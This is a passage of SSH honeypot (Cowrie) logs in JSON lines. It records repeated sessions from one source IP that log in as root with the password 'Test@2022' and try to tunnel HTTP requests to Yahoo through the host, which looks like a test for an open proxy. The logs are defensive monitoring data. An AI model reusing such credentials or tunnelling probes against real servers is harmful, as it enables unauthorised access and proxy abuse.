56-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:21.542558Z","src_ip":"213.209.150.239","session":"e1176d8ef994"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:21.824192Z","src_ip":"213.209.150.239","session":"e1176d8ef994"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":4768,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:4768","sensor":"my-vps","timestamp":"2025-08-26T01:04:21.881685Z","session":"e1176d8ef994"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:21.938374Z","src_ip":"213.209.150.239","session":"e1176d8ef994"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":30353,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:30353","sensor":"my-vps","timestamp":"2025-08-26T01:04:22.094826Z","session":"e1176d8ef994"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:22.151489Z","src_ip":"213.209.150.239","session":"e1176d8ef994"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:22.209034Z","src_ip":"213.209.150.239","session":"e1176d8ef994"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":30953,"dst_ip":"1.2.3.4","dst_port":22,"session":"7a41f14e0529","protocol":"ssh","message":"New connection: 213.209.150.239:30953 (1.2.3.4:22) [session: 7a41f14e0529]","sensor":"my-vps","timestamp":"2025-08-26T01:04:22.255359Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:22.256498Z","src_ip":"213.209.150.239","session":"7a41f14e0529"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:22.303772Z","src_ip":"213.209.150.239","session":"7a41f14e0529"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:22.538809Z","src_ip":"213.209.150.239","session":"7a41f14e0529"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":30556,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:30556","sensor":"my-vps","timestamp":"2025-08-26T01:04:22.587422Z","session":"7a41f14e0529"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:22.634810Z","src_ip":"213.209.150.239","session":"7a41f14e0529"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":25310,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:25310","sensor":"my-vps","timestamp":"2025-08-26T01:04:22.769775Z","session":"7a41f14e0529"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:22.817189Z","src_ip":"213.209.150.239","session":"7a41f14e0529"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:22.865011Z","src_ip":"213.209.150.239","session":"7a41f14e0529"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":30999,"dst_ip":"1.2.3.4","dst_port":22,"session":"58be833a8ec9","protocol":"ssh","message":"New connection: 213.209.150.239:30999 (1.2.3.4:22) [session: 58be833a8ec9]","sensor":"my-vps","timestamp":"2025-08-26T01:04:22.920586Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:22.921225Z","src_ip":"213.209.150.239","session":"58be833a8ec9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:22.978121Z","src_ip":"213.209.150.239","session":"58be833a8ec9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:23.260022Z","src_ip":"213.209.150.239","session":"58be833a8ec9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":4686,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:4686","sensor":"my-vps","timestamp":"2025-08-26T01:04:23.317721Z","session":"58be833a8ec9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:23.375204Z","src_ip":"213.209.150.239","session":"58be833a8ec9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":18619,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:18619","sensor":"my-vps","timestamp":"2025-08-26T01:04:23.530915Z","session":"58be833a8ec9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:23.587445Z","src_ip":"213.209.150.239","session":"58be833a8ec9"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:23.645046Z","src_ip":"213.209.150.239","session":"58be833a8ec9"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":31049,"dst_ip":"1.2.3.4","dst_port":22,"session":"e8d3b5e3d777","protocol":"ssh","message":"New connection: 213.209.150.239:31049 (1.2.3.4:22) [session: e8d3b5e3d777]","sensor":"my-vps","timestamp":"2025-08-26T01:04:23.700608Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:23.701740Z","src_ip":"213.209.150.239","session":"e8d3b5e3d777"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:23.758183Z","src_ip":"213.209.150.239","session":"e8d3b5e3d777"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:24.040224Z","src_ip":"213.209.150.239","session":"e8d3b5e3d777"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":8786,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:8786","sensor":"my-vps","timestamp":"2025-08-26T01:04:24.097871Z","session":"e8d3b5e3d777"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:24.154905Z","src_ip":"213.209.150.239","session":"e8d3b5e3d777"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":775,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:775","sensor":"my-vps","timestamp":"2025-08-26T01:04:24.310911Z","session":"e8d3b5e3d777"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:24.367428Z","src_ip":"213.209.150.239","session":"e8d3b5e3d777"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:24.425691Z","src_ip":"213.209.150.239","session":"e8d3b5e3d777"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":31116,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1532cfed86b","protocol":"ssh","message":"New connection: 213.209.150.239:31116 (1.2.3.4:22) [session: b1532cfed86b]","sensor":"my-vps","timestamp":"2025-08-26T01:04:24.481338Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:24.482533Z","src_ip":"213.209.150.239","session":"b1532cfed86b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:24.539488Z","src_ip":"213.209.150.239","session":"b1532cfed86b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:24.821869Z","src_ip":"213.209.150.239","session":"b1532cfed86b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":10069,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:10069","sensor":"my-vps","timestamp":"2025-08-26T01:04:24.879611Z","session":"b1532cfed86b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:24.936640Z","src_ip":"213.209.150.239","session":"b1532cfed86b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":20530,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:20530","sensor":"my-vps","timestamp":"2025-08-26T01:04:25.091341Z","session":"b1532cfed86b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:25.148331Z","src_ip":"213.209.150.239","session":"b1532cfed86b"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:25.205833Z","src_ip":"213.209.150.239","session":"b1532cfed86b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":31160,"dst_ip":"1.2.3.4","dst_port":22,"session":"1fb8c7cde09f","protocol":"ssh","message":"New connection: 213.209.150.239:31160 (1.2.3.4:22) [session: 1fb8c7cde09f]","sensor":"my-vps","timestamp":"2025-08-26T01:04:25.261431Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:25.262701Z","src_ip":"213.209.150.239","session":"1fb8c7cde09f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:25.319523Z","src_ip":"213.209.150.239","session":"1fb8c7cde09f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:25.601870Z","src_ip":"213.209.150.239","session":"1fb8c7cde09f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":2920,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:2920","sensor":"my-vps","timestamp":"2025-08-26T01:04:25.659578Z","session":"1fb8c7cde09f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:25.716202Z","src_ip":"213.209.150.239","session":"1fb8c7cde09f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":25586,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:25586","sensor":"my-vps","timestamp":"2025-08-26T01:04:25.870976Z","session":"1fb8c7cde09f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:25.927565Z","src_ip":"213.209.150.239","session":"1fb8c7cde09f"}
